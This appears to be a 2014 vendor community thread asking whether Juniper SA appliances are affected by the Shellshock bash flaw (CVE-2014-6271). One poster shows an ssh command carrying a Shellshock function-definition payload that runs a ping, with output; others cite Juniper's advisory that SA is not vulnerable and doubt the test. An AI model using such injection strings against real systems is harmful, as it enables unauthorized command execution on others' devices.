Re: Is SA vulnerable to CVE 2014-6271?

Bob N_ · ‎09-25-2014

Can anyone tell me if any SA software is available to CVE 2014-6271? Pretty sure its core is not GNU Bash but just want to make sure.

Thanks!

Mrkool_ · ‎09-25-2014

came here to ask the exact same question.

flip_pipe_ · ‎09-25-2014

Ups...

release 8.0R6

$ /usr/bin/ssh -o "rsaauthentication yes" XX.XXX.XXX.XXX '() { ignored; }; ping -c 3 127.0.0.1'
Password:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.032 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.025 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.025/0.028/0.032/0.006 ms, pipe 2
<hello xmlns="urn:ietfarams:xml:ns:netconf:base:1.0">
    <capabilities>
        <capability>urn:ietfarams:netconf:base:1.0</capability>
        <capability>urn:ietfarams:netconf:base:2.0</capability>
        <capability>http://xml.juniper.net/dmi/software/1.0</capability>
        <capability>http://xml.juniper.net/dmi/software/2.0</capability>
        <capability>http://xml.juniper.net/dmi/system/1.0</capability>
        <capability>http://xml.juniper.net/dmi/ive-sa/8.0R6</capability>
        <capability>urn:ietfarams:xml:ns:netconf:base:1.0</capability>
        <capability>urn:ietfarams:netconf:capability:writable-running:1.0</capability>
    </capabilities>
    <session-id>28301</session-id>
</hello>
]]>]]>
^CKilled by signal 2.

Mrkool_ · ‎09-25-2014

flip_pipe

and what does this mean?

Kita_ · ‎09-25-2014

Here is Juniper official statement about the bash vulnerability:

http://kb.pulsesecure.net/InfoCenter/index?page=content&id=JSA10648&smlogin=true

Bob N_ · ‎09-25-2014

Thanks Kita!

@kita wrote:

Here is Juniper official statement about the bash vulnerability:

http://kb.pulsesecure.net/InfoCenter/index?page=content&id=JSA10648&smlogin=true

akp_ · ‎09-25-2014

Hi flip_pipe,

Can you tell us how are you doing ssh to you sa device? How do you enable ssh?

jgu_ · ‎09-26-2014

I want to know that too, and according to Juniper's official statement, SA/MAG devices are not vulnerable. Besides, I don't understand why SA device would return XML stream after ping is executed.

Kita_ · ‎09-26-2014

SSH is not available on the SA. This is not a bash terminal.

jgu_ · ‎09-26-2014

Then how SA responded with non-netconf command "ping -c 3 127.0.0.1", should not SA refuse any thing else if netconf subsystem is not specified by client? I also don't understand why he specified ssh option "rsaauthentication yes" yet he had to enter password.